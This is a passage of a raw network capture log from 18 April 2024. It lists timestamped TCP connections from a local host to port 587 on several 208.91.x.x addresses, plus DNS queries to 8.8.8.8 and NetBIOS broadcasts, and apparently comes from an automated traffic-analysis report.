                                                                                      Apr 18, 2024 10:24:45.244359970 CEST58749171208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:45.244383097 CEST58749171208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:45.244577885 CEST49171587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:45.244641066 CEST49171587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:45.398312092 CEST58749171208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:46.220952034 CEST49174587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:46.301721096 CEST58749173208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:46.301999092 CEST49173587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:46.374243975 CEST58749174208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:46.374349117 CEST49174587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:46.455262899 CEST58749173208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:46.458444118 CEST58749173208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:46.458625078 CEST49173587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:46.532717943 CEST58749174208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:46.532891035 CEST49174587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:46.628889084 CEST58749173208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:46.686093092 CEST58749174208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:46.686474085 CEST58749174208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:46.686775923 CEST49174587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:46.829066038 CEST49173587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:46.843734026 CEST58749174208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:46.843966007 CEST49174587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:47.036701918 CEST58749174208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:47.931420088 CEST49172587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:48.085829020 CEST58749172208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.085846901 CEST58749172208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.086030006 CEST49172587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:48.086030006 CEST49172587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:48.239320040 CEST58749172208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.550048113 CEST58749174208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.550373077 CEST49174587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:48.703742027 CEST58749174208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.705421925 CEST58749174208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.705573082 CEST49174587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:48.812798023 CEST49175587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:48.824671030 CEST49176587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:24:48.877095938 CEST58749174208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.966288090 CEST58749175208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.967045069 CEST49175587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:48.977868080 CEST58749176208.91.199.225192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.977941990 CEST49176587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:24:49.075459957 CEST49174587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:49.126441002 CEST58749175208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:49.130379915 CEST49175587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:49.283927917 CEST58749175208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:49.284199953 CEST58749175208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:49.284413099 CEST49175587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:49.441251040 CEST58749175208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:49.441720009 CEST49175587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:49.520809889 CEST58749176208.91.199.225192.168.2.22
                                                                                      Apr 18, 2024 10:24:49.521007061 CEST49176587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:24:49.634744883 CEST58749175208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:49.674263000 CEST58749176208.91.199.225192.168.2.22
                                                                                      Apr 18, 2024 10:24:49.674693108 CEST58749176208.91.199.225192.168.2.22
                                                                                      Apr 18, 2024 10:24:49.674873114 CEST49176587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:24:49.832007885 CEST58749176208.91.199.225192.168.2.22
                                                                                      Apr 18, 2024 10:24:49.832353115 CEST49176587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:24:50.025254011 CEST58749176208.91.199.225192.168.2.22
                                                                                      Apr 18, 2024 10:24:51.550415039 CEST58749176208.91.199.225192.168.2.22
                                                                                      Apr 18, 2024 10:24:51.550457954 CEST58749175208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:51.556792021 CEST49176587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:24:51.556878090 CEST49175587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:51.710170984 CEST58749176208.91.199.225192.168.2.22
                                                                                      Apr 18, 2024 10:24:51.710498095 CEST58749175208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:51.712093115 CEST58749175208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:51.712389946 CEST49175587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:51.713795900 CEST58749176208.91.199.225192.168.2.22
                                                                                      Apr 18, 2024 10:24:51.713893890 CEST49176587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:24:51.884977102 CEST58749175208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:51.906116009 CEST58749176208.91.199.225192.168.2.22
                                                                                      Apr 18, 2024 10:24:51.912970066 CEST58749176208.91.199.225192.168.2.22
                                                                                      Apr 18, 2024 10:24:52.086224079 CEST49175587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:52.117535114 CEST49176587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:24:55.832062006 CEST49174587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:55.832112074 CEST49173587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:55.986268044 CEST58749173208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:55.986304045 CEST58749173208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:55.986320019 CEST58749174208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:55.986335993 CEST58749174208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:55.986350060 CEST49173587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:55.986368895 CEST49174587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:55.986605883 CEST49173587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:55.987081051 CEST49174587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:55.990195990 CEST49177587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:56.139729977 CEST58749173208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:56.140307903 CEST58749174208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:56.143410921 CEST58749177208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:56.143469095 CEST49177587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:56.303076982 CEST58749177208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:56.303210020 CEST49177587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:56.456846952 CEST58749177208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:56.457040071 CEST58749177208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:56.457195044 CEST49177587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:56.614689112 CEST58749177208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:56.614926100 CEST49177587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:56.807677984 CEST58749177208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:58.407046080 CEST58749177208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:58.419975042 CEST49177587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:58.573966980 CEST58749177208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:58.576431036 CEST58749177208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:58.576741934 CEST49177587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:58.748768091 CEST58749177208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:59.012729883 CEST49177587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:24:59.138678074 CEST58749177208.91.198.143192.168.2.22
                                                                                      Apr 18, 2024 10:24:59.138772011 CEST49177587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:06.310566902 CEST49176587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:25:06.310635090 CEST49175587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:06.798082113 CEST49175587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:06.828366041 CEST49176587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:25:07.405602932 CEST49175587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:07.436676979 CEST49176587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:25:08.326282978 CEST49178587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:25:08.600235939 CEST49175587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:08.637841940 CEST49176587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:25:09.260175943 CEST49177587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:09.761081934 CEST49177587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:10.385067940 CEST49177587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:11.005409002 CEST49175587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:11.040388107 CEST49176587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:25:11.321105003 CEST49178587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:25:11.633100033 CEST49177587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:14.113569021 CEST49177587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:15.798372030 CEST49175587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:15.845112085 CEST49176587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:25:17.327219009 CEST49178587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:25:19.074539900 CEST49177587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:24.456724882 CEST49179587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:25.454838037 CEST49176587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:25:25.501519918 CEST49175587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:27.451523066 CEST49179587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:28.995918036 CEST49177587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:29.339380026 CEST49178587192.168.2.22208.91.199.224
                                                                                      Apr 18, 2024 10:25:30.587596893 CEST49180587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:32.349941015 CEST49178587192.168.2.22208.91.199.224
                                                                                      Apr 18, 2024 10:25:33.477111101 CEST49179587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:33.598082066 CEST49180587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:34.248503923 CEST49181587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:37.295253992 CEST49181587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:38.402889967 CEST49178587192.168.2.22208.91.199.224
                                                                                      Apr 18, 2024 10:25:39.588479042 CEST49180587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:43.301287889 CEST49181587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:45.485516071 CEST49179587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:25:48.480753899 CEST49179587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:25:50.461766958 CEST49178587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:51.663050890 CEST49180587192.168.2.22208.91.199.223
                                                                                      Apr 18, 2024 10:25:53.520103931 CEST49178587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:25:54.502037048 CEST49179587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:25:54.685980082 CEST49180587192.168.2.22208.91.199.223
                                                                                      Apr 18, 2024 10:25:55.360240936 CEST49181587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:25:58.464442015 CEST49181587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:25:59.572036982 CEST49178587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:26:00.728126049 CEST49180587192.168.2.22208.91.199.223
                                                                                      Apr 18, 2024 10:26:04.564049006 CEST49181587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:26:06.514261961 CEST49179587192.168.2.22208.91.199.223
                                                                                      Apr 18, 2024 10:26:09.556123972 CEST49179587192.168.2.22208.91.199.223
                                                                                      Apr 18, 2024 10:26:11.616370916 CEST49178587192.168.2.22208.91.199.223
                                                                                      Apr 18, 2024 10:26:12.749049902 CEST49180587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:26:14.657305002 CEST49178587192.168.2.22208.91.199.223
                                                                                      Apr 18, 2024 10:26:15.562131882 CEST49179587192.168.2.22208.91.199.223
                                                                                      Apr 18, 2024 10:26:15.764887094 CEST49180587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:26:20.663405895 CEST49178587192.168.2.22208.91.199.223
                                                                                      Apr 18, 2024 10:26:21.864562988 CEST49180587192.168.2.22208.91.199.225
                                                                                      Apr 18, 2024 10:26:21.986711979 CEST49181587192.168.2.22208.91.199.224
                                                                                      Apr 18, 2024 10:26:25.015727997 CEST49181587192.168.2.22208.91.199.224
                                                                                      Apr 18, 2024 10:26:27.667929888 CEST49179587192.168.2.22208.91.199.224
                                                                                      Apr 18, 2024 10:26:30.662936926 CEST49179587192.168.2.22208.91.199.224
                                                                                      Apr 18, 2024 10:26:31.110481024 CEST49181587192.168.2.22208.91.199.224
                                                                                      Apr 18, 2024 10:26:33.870927095 CEST49180587192.168.2.22208.91.199.224
                                                                                      Apr 18, 2024 10:26:36.762569904 CEST49179587192.168.2.22208.91.199.224
                                                                                      Apr 18, 2024 10:26:36.918556929 CEST49180587192.168.2.22208.91.199.224
                                                                                      Apr 18, 2024 10:26:43.018228054 CEST49180587192.168.2.22208.91.199.224
                                                                                      Apr 18, 2024 10:26:45.519274950 CEST49181587192.168.2.22208.91.199.223
                                                                                      Apr 18, 2024 10:26:48.275846958 CEST49182587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:26:48.618591070 CEST49181587192.168.2.22208.91.199.223
                                                                                      Apr 18, 2024 10:26:51.270725012 CEST49182587192.168.2.22208.91.198.143
                                                                                      Apr 18, 2024 10:26:54.616210938 CEST49181587192.168.2.22208.91.199.223
                                                                                      Apr 18, 2024 10:26:57.276707888 CEST49182587192.168.2.22208.91.198.143

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Apr 18, 2024 10:23:47.736828089 CEST138138192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:23:51.908421040 CEST138138192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:23:54.159703016 CEST5456253192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:23:54.289743900 CEST53545628.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:00.799091101 CEST5291753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:00.918476105 CEST53529178.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:01.768346071 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:02.524877071 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:02.615402937 CEST6275153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:02.628129959 CEST5789353192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:02.735512018 CEST53578938.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:02.771320105 CEST5789353192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:02.807598114 CEST53627518.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:02.808079958 CEST6275153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:02.878804922 CEST53578938.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:02.879147053 CEST5789353192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:02.915587902 CEST53627518.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:02.915832043 CEST6275153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:02.984225035 CEST53578938.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:02.984481096 CEST5789353192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:03.020723104 CEST53627518.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:03.021029949 CEST6275153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:03.089870930 CEST53578938.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:03.129018068 CEST53627518.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:03.135205984 CEST5789353192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:03.155044079 CEST5482153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:03.241738081 CEST53578938.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:03.242441893 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:03.263102055 CEST53548218.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:03.289247990 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:03.991269112 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:04.755764008 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:05.574213982 CEST5471953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:05.679852009 CEST53547198.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:05.680083990 CEST5471953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:05.785197973 CEST53547198.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:07.269649982 CEST4988153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:07.374483109 CEST53498818.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:07.595623016 CEST4988153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:07.700669050 CEST53498818.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:08.245851994 CEST5499853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:08.351823092 CEST53549988.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:08.352066994 CEST5499853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:08.457222939 CEST53549988.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:08.486450911 CEST5499853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:08.591680050 CEST53549988.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:08.591933012 CEST5499853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:08.697057009 CEST53549988.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:08.697343111 CEST5499853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:08.802454948 CEST53549988.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:08.819658041 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:08.906383991 CEST5278153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:09.026017904 CEST53527818.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:09.026467085 CEST5278153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:09.147062063 CEST53527818.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:09.576097012 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:10.045865059 CEST6392653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:10.085376978 CEST6551053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:10.150906086 CEST53639268.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:10.151242971 CEST6392653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:10.191788912 CEST53655108.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:10.193487883 CEST6551053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:10.256194115 CEST53639268.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:10.256594896 CEST6392653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:10.298892975 CEST53655108.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:10.299745083 CEST6551053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:10.340492964 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:10.362170935 CEST53639268.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:10.362513065 CEST6392653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:10.407037020 CEST53655108.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:10.408123016 CEST6551053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:10.468060970 CEST53639268.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:10.469623089 CEST6392653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:10.513268948 CEST53655108.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:10.537807941 CEST6551053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:10.575653076 CEST53639268.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:10.576432943 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:10.642803907 CEST53655108.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:10.646167994 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:11.118777037 CEST6267253192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:11.223377943 CEST53626728.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:11.223653078 CEST6267253192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:11.328705072 CEST53626728.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:11.328952074 CEST6267253192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:11.338892937 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:11.401297092 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:11.434159040 CEST53626728.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:11.434425116 CEST6267253192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:11.539330959 CEST53626728.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:11.735070944 CEST5647553192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:11.839651108 CEST53564758.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:11.839986086 CEST5647553192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:11.944811106 CEST53564758.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:12.103478909 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:12.165802956 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:12.889708042 CEST4938453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:13.000364065 CEST53493848.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:13.000824928 CEST4938453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:13.105609894 CEST53493848.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:13.106060028 CEST4938453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:13.210928917 CEST53493848.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:13.213027000 CEST4938453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:13.317935944 CEST53493848.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:13.328210115 CEST5484253192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:13.433374882 CEST53548428.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:13.433931112 CEST5484253192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:13.538892984 CEST53548428.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:33.186202049 CEST5810553192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:33.291060925 CEST53581058.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:33.292258024 CEST5810553192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:33.397862911 CEST53581058.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:33.398127079 CEST5810553192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:33.502810001 CEST53581058.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:33.508918047 CEST6492853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:33.613821983 CEST53649288.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:33.614180088 CEST6492853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:33.718859911 CEST53649288.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:33.719212055 CEST6492853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:33.823872089 CEST53649288.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:33.824076891 CEST6492853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:33.928817987 CEST53649288.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:33.929028034 CEST6492853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:34.033823967 CEST53649288.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:36.190516949 CEST5739053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:36.295732975 CEST53573908.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:36.296114922 CEST5739053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:36.400875092 CEST53573908.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:36.416476965 CEST5809553192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:36.521560907 CEST53580958.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:40.270355940 CEST5426153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:40.374821901 CEST53542618.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:40.375076056 CEST5426153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:40.480005980 CEST53542618.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:40.480314016 CEST5426153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:40.585784912 CEST53542618.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:40.585977077 CEST5426153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:40.690351009 CEST53542618.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:40.690572023 CEST5426153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:40.796732903 CEST53542618.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:40.797508001 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:41.556257963 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:42.320777893 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:43.091598034 CEST6050753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:43.196376085 CEST53605078.8.8.8192.168.2.22
